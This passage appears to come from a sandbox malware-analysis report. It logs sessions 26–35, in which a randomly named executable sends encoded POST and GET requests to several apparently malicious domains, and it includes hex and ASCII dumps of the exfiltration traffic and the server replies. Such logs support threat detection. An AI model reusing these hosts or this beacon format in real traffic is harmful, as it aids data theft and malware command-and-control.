                                                      Data Ascii: N0spilI0=c/pvFaX75Hx8LiSeJ2lYlq6nqOYks6N1YJgsTtJ3UL0iQM0X2cPqTYjpqFQVirHwTaguJ/+AdXjD8lmGAnPsUPbRECrkPdvDuR0uxdmxzfVCxRZk5S6pRLBP7FVoZvndOvzUeQQ7cVoosW997cZpqW7oischvaH+mHdXsDDIaMOlPEAs7Zdeo0+x06bl/b5twQ==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.449763103.21.221.480600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:41.563277006 CEST780OUTPOST /abla/ HTTP/1.1
                                                      Host: www.tempatmudisini01.click
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.tempatmudisini01.click
                                                      Referer: http://www.tempatmudisini01.click/abla/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 63 2f 70 76 46 61 58 37 35 48 78 38 4b 43 69 65 50 6c 4e 59 74 71 36 6b 6d 75 59 6b 6d 61 4e 78 59 4a 73 73 54 70 77 79 55 2b 45 69 51 75 38 58 33 65 6e 71 53 59 6a 70 6c 6c 51 55 2f 62 48 35 54 64 70 5a 4a 36 57 41 64 58 33 44 38 6b 57 47 41 30 6e 76 58 2f 62 58 63 79 72 6d 4c 64 76 44 75 52 30 75 78 65 61 62 7a 65 39 43 78 45 52 6b 37 7a 36 6d 53 4c 42 4d 34 46 56 6f 4f 66 6e 5a 4f 76 7a 6d 65 52 4d 52 63 57 51 6f 73 53 35 39 2f 64 5a 32 67 57 37 75 76 4d 63 32 6a 71 71 41 67 58 35 65 76 51 2f 61 52 73 32 7a 44 69 52 32 71 6f 38 4a 36 30 61 43 70 39 53 52 79 59 45 6b 72 58 44 77 45 52 76 72 74 59 36 61 42 78 35 72 76 4f 34 4e 63 6b 77 3d
                                                      Data Ascii: N0spilI0=c/pvFaX75Hx8KCiePlNYtq6kmuYkmaNxYJssTpwyU+EiQu8X3enqSYjpllQU/bH5TdpZJ6WAdX3D8kWGA0nvX/bXcyrmLdvDuR0uxeabze9CxERk7z6mSLBM4FVoOfnZOvzmeRMRcWQosS59/dZ2gW7uvMc2jqqAgX5evQ/aRs2zDiR2qo8J60aCp9SRyYEkrXDwERvrtY6aBx5rvO4Nckw=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.449764103.21.221.480600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:44.109908104 CEST10862OUTPOST /abla/ HTTP/1.1
                                                      Host: www.tempatmudisini01.click
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.tempatmudisini01.click
                                                      Referer: http://www.tempatmudisini01.click/abla/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 63 2f 70 76 46 61 58 37 35 48 78 38 4b 43 69 65 50 6c 4e 59 74 71 36 6b 6d 75 59 6b 6d 61 4e 78 59 4a 73 73 54 70 77 79 55 2f 51 69 51 37 77 58 78 35 37 71 56 59 6a 70 37 56 51 76 2f 62 47 72 54 63 4e 64 4a 36 61 51 64 56 50 44 7a 6d 65 47 51 56 6e 76 4d 76 62 58 56 53 72 6e 50 64 75 65 75 52 6b 71 78 64 79 62 7a 65 39 43 78 46 68 6b 38 69 36 6d 55 4c 42 50 37 46 56 61 5a 76 6e 39 4f 76 4c 32 65 52 4a 6d 63 6d 77 6f 74 79 70 39 39 4c 6c 32 39 47 37 73 71 4d 64 7a 6a 71 6d 6c 67 58 6b 6e 76 52 4c 30 52 76 71 7a 54 31 6f 54 32 38 49 77 75 31 54 59 31 4d 4f 4c 39 76 6b 6c 79 46 69 46 50 55 4b 79 2b 39 61 33 62 52 51 56 72 50 77 6d 59 67 79 4c 77 45 67 77 35 63 69 55 73 44 68 68 61 56 76 4d 44 62 42 38 41 77 59 68 59 53 6d 75 33 38 69 4d 74 6a 69 72 57 65 33 43 32 6b 4f 44 6a 58 61 4b 49 6e 63 57 52 55 35 6e 4d 38 61 2f 64 6f 52 39 7a 33 2b 64 63 38 4f 58 67 50 61 4b 54 6c 44 69 7a 30 6d 68 67 31 48 4f 4a 6f 41 30 4e 4e 76 4a 4e 62 65 34 71 41 48 34 41 7a 63 55 6c 49 69 58 66 [TRUNCATED]
                                                      Data Ascii: N0spilI0=c/pvFaX75Hx8KCiePlNYtq6kmuYkmaNxYJssTpwyU/QiQ7wXx57qVYjp7VQv/bGrTcNdJ6aQdVPDzmeGQVnvMvbXVSrnPdueuRkqxdybze9CxFhk8i6mULBP7FVaZvn9OvL2eRJmcmwotyp99Ll29G7sqMdzjqmlgXknvRL0RvqzT1oT28Iwu1TY1MOL9vklyFiFPUKy+9a3bRQVrPwmYgyLwEgw5ciUsDhhaVvMDbB8AwYhYSmu38iMtjirWe3C2kODjXaKIncWRU5nM8a/doR9z3+dc8OXgPaKTlDiz0mhg1HOJoA0NNvJNbe4qAH4AzcUlIiXfoH/nS9kwKagQHz1QWr1vxS5UvCojcgT/a7NBxzWQ+nukH+FXOGMG1Vu5kjuQCGt3FJTBqmFXN5ytYYj+4emtMhvpl4FmrgqIp2rcle4tMz+AT56Xmd6iYj3bbpfFhfIT8We57A58k84pmWEwKxnxFht6CsgXYc7nwEvW3mkmF++WfNlzuj62lU2fYR/B2Whk7TAisMRIuLi7odpcn7XjIBes7N/XKLvFnDJw2xbI2ujDs1a/mRsdUqwPPEnWIMz4VY+fl3cN+CKZa9i0bx05OwaKYyu78nPD5suCMP1GFSWRw4bR2JJDpfjJHxx56r8GHBCI3/KkLMitVKE1YxkGvkrEdplp5783yjhxFalDVxCzdbzm0vnhPN8iCxobkfUHwkzLlPP0Ps3yuj0G8JADi9qkZgZZjvz7HpNbZoh5YuavaoAvnc8VgMQlB1gRIp6Lpnvgt97iMK5T8J8+VRVWgatPzYU3af/jxYyZRDwc3RbXNuJ10+H89cVomVp7BO7YYQ10QBYAig9atxJSrnq1/OtUaJYDAB2/HOwzhzgqKaejLjD7466WId1YSsiEI7yMrcsu7nraj/A8Za46B0WwGQEdu5cNgx5g6JFRW3l4Ya+zvGhpROIu4hWoYxkUgYDYlq9xYdJVgoCEjkgLaxAuyT7Oke1vAtZdiE [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.449765103.21.221.480600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:46.656461954 CEST480OUTGET /abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.tempatmudisini01.click
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:37:51.440862894 CEST535INHTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      x-powered-by: PHP/7.4.33
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      content-type: text/html; charset=UTF-8
                                                      x-redirect-by: WordPress
                                                      location: http://tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010P
                                                      x-litespeed-cache: miss
                                                      content-length: 0
                                                      date: Wed, 25 Sep 2024 03:37:51 GMT
                                                      server: LiteSpeed


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.4497663.33.130.19080600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:56.490895033 CEST724OUTPOST /xweg/ HTTP/1.1
                                                      Host: www.o731lh.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.o731lh.vip
                                                      Referer: http://www.o731lh.vip/xweg/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6c 53 6c 6d 61 65 32 57 37 49 64 2f 61 76 50 34 2b 64 6f 63 57 52 39 78 6d 7a 2b 6f 75 35 58 58 6e 36 4a 6a 4d 73 62 68 5a 41 45 46 4b 64 2f 34 74 2f 54 75 75 67 61 6c 64 77 31 5a 6a 71 4c 2f 54 67 71 4b 4b 51 4a 76 59 39 45 34 36 41 36 6c 67 55 38 37 75 48 50 44 77 38 2b 70 63 6f 68 49 43 69 78 54 32 61 50 52 76 41 53 47 47 54 6f 62 61 44 77 7a 4c 64 6f 78 57 64 64 5a 66 53 6e 37 78 30 2b 4b 59 33 44 47 33 53 2f 62 37 67 47 56 72 48 43 68 70 51 70 6e 73 36 49 6b 31 61 4b 52 75 67 5a 37 66 62 38 51 31 63 4a 7a 48 6f 41 54 30 37 38 35 65 41 3d 3d
                                                      Data Ascii: N0spilI0=+wuAD7MsHC5clSlmae2W7Id/avP4+docWR9xmz+ou5XXn6JjMsbhZAEFKd/4t/Tuugaldw1ZjqL/TgqKKQJvY9E46A6lgU87uHPDw8+pcohICixT2aPRvASGGTobaDwzLdoxWddZfSn7x0+KY3DG3S/b7gGVrHChpQpns6Ik1aKRugZ7fb8Q1cJzHoAT0785eA==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.4497673.33.130.19080600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:59.095629930 CEST744OUTPOST /xweg/ HTTP/1.1
                                                      Host: www.o731lh.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.o731lh.vip
                                                      Referer: http://www.o731lh.vip/xweg/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6b 7a 56 6d 5a 39 75 57 73 34 64 34 47 2f 50 34 33 39 70 56 57 52 68 78 6d 79 72 74 75 4b 7a 58 6e 66 74 6a 4e 74 62 68 4a 51 45 46 54 74 2f 39 77 50 54 54 75 67 57 62 64 79 52 5a 6a 71 50 2f 54 6b 75 4b 4c 6e 39 73 5a 74 45 41 32 67 36 6e 39 45 38 37 75 48 50 44 77 38 71 50 63 72 52 49 44 53 68 54 77 2f 6a 57 6d 67 53 5a 57 44 6f 62 4d 7a 78 36 4c 64 6f 54 57 63 42 7a 66 52 66 37 78 77 36 4b 57 46 72 48 38 53 2f 52 6d 77 48 4e 71 55 37 54 6a 7a 49 57 71 37 6f 6b 30 71 53 46 69 47 49 68 4f 71 64 48 6e 63 74 41 61 76 4a 6e 35 34 42 77 46 4b 54 32 6b 4d 71 4a 43 71 37 6b 36 34 78 4d 6a 61 6f 66 44 50 73 3d
                                                      Data Ascii: N0spilI0=+wuAD7MsHC5ckzVmZ9uWs4d4G/P439pVWRhxmyrtuKzXnftjNtbhJQEFTt/9wPTTugWbdyRZjqP/TkuKLn9sZtEA2g6n9E87uHPDw8qPcrRIDShTw/jWmgSZWDobMzx6LdoTWcBzfRf7xw6KWFrH8S/RmwHNqU7TjzIWq7ok0qSFiGIhOqdHnctAavJn54BwFKT2kMqJCq7k64xMjaofDPs=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.4497683.33.130.19080600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:01.643023968 CEST10826OUTPOST /xweg/ HTTP/1.1
                                                      Host: www.o731lh.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.o731lh.vip
                                                      Referer: http://www.o731lh.vip/xweg/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6b 7a 56 6d 5a 39 75 57 73 34 64 34 47 2f 50 34 33 39 70 56 57 52 68 78 6d 79 72 74 75 4b 37 58 6d 70 78 6a 50 4f 7a 68 4b 51 45 46 4d 64 2f 38 77 50 54 43 75 67 65 66 64 79 64 76 6a 73 54 2f 54 48 6d 4b 44 79 52 73 54 74 45 41 2b 41 36 6b 67 55 39 76 75 48 66 66 77 38 36 50 63 72 52 49 44 58 6c 54 77 71 50 57 71 41 53 47 47 54 70 4a 61 44 77 66 4c 64 77 70 57 63 46 4a 66 67 2f 37 77 51 71 4b 55 32 44 48 2f 79 2f 66 6e 77 48 65 71 56 48 49 6a 7a 6c 70 71 37 64 44 30 6f 4f 46 7a 78 46 46 52 65 56 37 37 39 64 45 46 73 56 36 35 6f 4a 33 4e 61 54 46 75 2b 57 63 61 35 54 54 32 49 49 37 78 71 49 75 65 76 44 45 43 61 6f 33 68 54 5a 30 70 64 59 33 73 44 78 4a 38 69 79 57 42 48 52 54 4a 42 77 39 66 6b 30 48 6b 45 2f 59 62 47 2f 2f 4c 30 2f 6f 43 32 53 41 4f 71 41 4c 35 71 73 6a 41 6a 50 38 71 4a 47 34 4d 75 44 49 72 4a 4b 62 56 43 38 35 58 72 37 34 76 51 58 6f 48 38 70 67 68 58 44 76 4a 64 44 64 48 32 58 72 4a 6d 70 4c 35 73 6f 63 30 2f 45 44 7a [TRUNCATED]
                                                      Data Ascii: N0spilI0=+wuAD7MsHC5ckzVmZ9uWs4d4G/P439pVWRhxmyrtuK7XmpxjPOzhKQEFMd/8wPTCugefdydvjsT/THmKDyRsTtEA+A6kgU9vuHffw86PcrRIDXlTwqPWqASGGTpJaDwfLdwpWcFJfg/7wQqKU2DH/y/fnwHeqVHIjzlpq7dD0oOFzxFFReV779dEFsV65oJ3NaTFu+Wca5TT2II7xqIuevDECao3hTZ0pdY3sDxJ8iyWBHRTJBw9fk0HkE/YbG//L0/oC2SAOqAL5qsjAjP8qJG4MuDIrJKbVC85Xr74vQXoH8pghXDvJdDdH2XrJmpL5soc0/EDzU9uw5CmNOqUZ5iPwlWrBNXphhU0kJWxue3+VBeFOnimW+87q7VIhM46fV6BL6dU08pJig/Bdkzfoing71mY8PsrXHTd4k/nr9X6uo5tWXRSwFYadRoe/qvsi6SL932uRi8HRTaXCrCQ01QcRunJcsMLIlXX7yknMIvvWSWBPXfZeGdovYdPgS4hh/2B8T24L2HNFXrx1uUJBchBgRI/wXP+EC2RqyD/Bzf+QSZEHbKd4XST92gSDvlrR5Qmmw4uWOUQgyyikD/2KW8jLcJUVS8U/TZ6mEovK41qC9cyZz9y42c68BzLvfZ0UIQKOcERhrlLy1bC49VGORtCnoYwHY4gH9Jte0O1ODlPnpl04SeGThqpVn1YSEMn9D8UCt3L3ZKnRfRcxJoiN7mc7YS9gInXyUPpa7F8xl1Ga5zy2bYaK1rodZ/nHgQlAMtqVfWVWCbAWPp/2PgYkfgoQftYLcSjy6lh2wBJ+XQQVUnfTRbpmbJNVeB8FbyTUxZ6lmOzNOsq+M3meEHn7VNpuk0h8fH+lKlZGpfQg4fdcMMXweNlvCeYM25nr460LL/bV4+rJnM/BArQ7iCBdT2pV4SY9i2618KBxr6WkEx1r3erg6IOPWQNsQaY+jo8benp3KpEMj+RTG+EOjzu9zJ5RKHlhTPF7iuC6O/s0se [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.4497693.33.130.19080600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:04.623636961 CEST468OUTGET /xweg/?Vvn=XtJLE6KXyHJ010P&N0spilI0=zyGgAOIUWHAkjy5wbuax0/FfUf3h0NwJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8Y+Ai5wuik0xspH+a6MWSZLxuSkFH9/b6rws= HTTP/1.1
                                                      Host: www.o731lh.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:38:05.078841925 CEST404INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 25 Sep 2024 03:38:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 264
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 76 6e 3d 58 74 4a 4c 45 36 4b 58 79 48 4a 30 31 30 50 26 4e 30 73 70 69 6c 49 30 3d 7a 79 47 67 41 4f 49 55 57 48 41 6b 6a 79 35 77 62 75 61 78 30 2f 46 66 55 66 33 68 30 4e 77 4a 61 78 5a 49 68 43 2b 4a 6c 4f 36 44 6e 62 5a 59 56 66 6e 33 57 6c 67 36 43 75 71 34 76 6f 6e 4b 2b 30 75 62 65 42 78 54 6e 73 44 4f 61 58 2b 62 42 54 6b 38 59 2b 41 69 35 77 75 69 6b 30 78 73 70 48 2b 61 36 4d 57 53 5a 4c 78 75 53 6b 46 48 39 2f 62 36 72 77 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Vvn=XtJLE6KXyHJ010P&N0spilI0=zyGgAOIUWHAkjy5wbuax0/FfUf3h0NwJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8Y+Ai5wuik0xspH+a6MWSZLxuSkFH9/b6rws="}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.4497703.33.130.19080600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:10.126601934 CEST757OUTPOST /2ho9/ HTTP/1.1
                                                      Host: www.consultarfacil.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.consultarfacil.online
                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 47 39 73 50 4c 54 63 62 52 65 43 52 79 6d 37 37 70 51 30 65 33 79 2b 6e 6e 4f 37 5a 6f 75 63 70 42 75 69 68 32 53 36 5a 56 77 4c 32 6a 54 30 6c 65 5a 2b 76 4f 33 37 36 62 6e 44 50 34 77 68 6d 62 4b 32 2f 7a 35 37 4c 44 61 61 79 4a 61 78 62 48 66 67 61 67 76 6d 38 4a 77 61 67 77 55 34 36 67 61 31 73 64 68 63 38 7a 36 62 7a 59 4c 47 39 74 33 6a 41 51 64 56 46 31 6d 44 75 7a 62 4c 72 45 61 71 41 74 6d 4a 64 77 75 4d 39 6e 49 64 6b 33 56 4c 6d 32 36 46 38 79 54 57 36 7a 50 78 75 38 4a 72 62 47 63 48 62 66 54 77 4e 68 4e 59 68 64 45 51 49 2b 67 3d 3d
                                                      Data Ascii: N0spilI0=hbrIhRUnKXpFG9sPLTcbReCRym77pQ0e3y+nnO7ZoucpBuih2S6ZVwL2jT0leZ+vO376bnDP4whmbK2/z57LDaayJaxbHfgagvm8JwagwU46ga1sdhc8z6bzYLG9t3jAQdVF1mDuzbLrEaqAtmJdwuM9nIdk3VLm26F8yTW6zPxu8JrbGcHbfTwNhNYhdEQI+g==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.4497713.33.130.19080600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:12.674756050 CEST777OUTPOST /2ho9/ HTTP/1.1
                                                      Host: www.consultarfacil.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.consultarfacil.online
                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 48 64 63 50 4b 30 49 62 58 2b 43 4f 75 57 37 37 67 77 30 61 33 79 69 6e 6e 4c 62 4a 72 61 77 70 42 50 53 68 6b 54 36 5a 55 77 4c 32 6b 6a 30 6b 42 4a 2b 6d 4f 33 6d 4a 62 6a 4c 50 34 77 31 6d 62 4b 47 2f 7a 71 6a 49 44 4b 61 4b 42 36 78 46 4b 2f 67 61 67 76 6d 38 4a 30 32 47 77 55 77 36 68 71 6c 73 63 46 77 2f 2b 61 62 30 51 72 47 39 6d 58 69 4c 51 64 55 69 31 69 69 44 7a 5a 44 72 45 59 43 41 74 33 4a 53 6e 2b 4d 37 70 6f 63 68 6d 6d 32 6a 35 2f 38 6f 73 69 79 49 74 72 38 4b 39 50 36 42 58 74 6d 4d 4e 54 55 2b 38 4b 52 56 51 48 74 42 6c 68 59 33 2f 2f 2f 62 58 48 79 77 52 67 45 35 75 77 67 35 5a 4e 49 3d
                                                      Data Ascii: N0spilI0=hbrIhRUnKXpFHdcPK0IbX+COuW77gw0a3yinnLbJrawpBPShkT6ZUwL2kj0kBJ+mO3mJbjLP4w1mbKG/zqjIDKaKB6xFK/gagvm8J02GwUw6hqlscFw/+ab0QrG9mXiLQdUi1iiDzZDrEYCAt3JSn+M7pochmm2j5/8osiyItr8K9P6BXtmMNTU+8KRVQHtBlhY3///bXHywRgE5uwg5ZNI=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.4497723.33.130.19080600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:15.222847939 CEST10859OUTPOST /2ho9/ HTTP/1.1
                                                      Host: www.consultarfacil.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.consultarfacil.online
                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 48 64 63 50 4b 30 49 62 58 2b 43 4f 75 57 37 37 67 77 30 61 33 79 69 6e 6e 4c 62 4a 72 62 6b 70 42 38 61 68 6e 77 53 5a 4f 77 4c 32 72 7a 30 70 42 4a 2f 30 4f 33 2b 57 62 6a 48 31 34 7a 4e 6d 62 72 6d 2f 6e 50 58 49 49 4b 61 4b 65 71 78 59 48 66 67 31 67 72 4c 33 4a 77 57 47 77 55 77 36 68 73 5a 73 49 68 63 2f 38 61 62 7a 59 4c 47 35 74 33 69 6a 51 64 4e 64 31 6a 6a 2b 79 70 6a 72 46 34 53 41 73 46 68 53 6b 65 4d 35 75 6f 63 48 6d 6d 36 6f 35 2f 49 6b 73 69 48 56 74 73 30 4b 39 70 76 57 4d 5a 6e 57 5a 51 77 38 6f 4e 68 79 57 47 46 6c 70 69 63 79 2f 61 6a 69 4a 45 65 55 62 7a 52 4b 74 55 63 52 62 70 70 67 71 50 79 73 31 41 69 4c 34 45 57 71 75 62 64 4c 4d 6a 51 39 4d 50 37 36 51 71 63 61 6b 68 71 71 41 5a 6e 51 63 54 58 79 4f 55 79 78 39 4a 4c 5a 70 52 6a 41 2b 47 75 38 73 41 34 58 74 76 67 46 6c 37 4d 66 47 35 34 61 48 32 49 6b 34 63 51 51 45 38 5a 79 32 59 66 64 35 79 58 77 7a 2b 5a 38 49 30 56 6e 4e 42 51 2b 38 36 38 50 53 4b 4d 37 38 [TRUNCATED]
